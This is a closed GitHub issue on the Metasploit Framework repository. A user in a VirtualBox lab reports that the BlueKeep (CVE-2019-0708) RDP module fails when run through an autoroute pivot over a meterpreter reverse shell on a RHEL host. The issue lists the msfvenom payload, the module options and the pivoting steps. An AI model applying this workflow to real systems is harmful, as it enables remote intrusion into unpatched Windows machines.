rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Meterpreter session crashes running CVE_2019_0708 module #14688

Closed crackaboi closed 3 years ago

crackaboi commented 3 years ago

I am using VirtualBox, and am trying to hack into a Windows 7 Ultimate Edition SP1 using Metasploit module windows/rdp/cve_2019_0708_bluekeep_rce. I have made it so the Win7 is vulnerable to the module by allowing remote connections, thus opening RDP port 3398.

CVE details: https://nvd.nist.gov/vuln/detail/CVE-2019-0708
Module details: https://www.rapid7.com/db/modules/exploit/windows/rdp/cve_2019_0708_bluekeep_rce/

My Kali Machine (IP: 1.1.1.2 Subnet: 1.1.1.1/30, External)
RHEL Machine (IP: 10.0.0.209 Subnet: 10.0.0.1/24, DMZ)
Win7 Target (IP: 192.168.0.198 Subnet: 192.168.0.193/29, Internal)

Kali can ping RHEL only, and only RHEL can ping Win7, so I need to Meterpreter to RHEL and autoroute before I can Meterpreter into Win7.

First, I use msfvenom to generate a linux/x86/meterpreter/reverse_tcp payload and deliver it to the RHEL machine (RHEL is x86_64), gaining a meterpreter session to that machine. I use run autoroute -s 10.0.0.1/24

Then I use run autoroute -s 192.168.0.193/29.

I background the Meterpreter session then run the BlueKeep module. I set the following for the options:

RHOSTS: 192.168.0.198
RPORT: 3398 (Port 3398 is open in Win7)
Payload: windows/meterpreter/reverse_tcp (I tried using /x64 too, no difference)
Target: 2 (2 specifies target is Windows 7 SP1 on VirtualBox 6, which it is)
LHOST: 1.1.1.2
LPORT: 4444
groomsize: 20

I get the following error: Exploit failed: IOError stream closed in another thread

After trying to exploit a few times, the meterpreter session I have established with the RHEL machine also gets closed with Reason: Died.

I also tried doing this exploit with the Kali and Win7 in the same network (so RHEL not needed, and thus no pivoting), and it worked fine, so it seems like it's an issue with the pivoting rather than configurations on the Win7 machine.

Neither the RHEL nor the Win7 crashed at any point either.

Any assistance is greatly appreciated! Thank you!

gwillcox-r7 commented 3 years ago

Updated explanation for clarity, mainly around code highlighting.

Student-Jasons commented 3 years ago

Try installing it once, it's the last way and the best way.

crackaboi commented 3 years ago

> Try installing it once, it's the last way and the best

Installing what exactly?

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.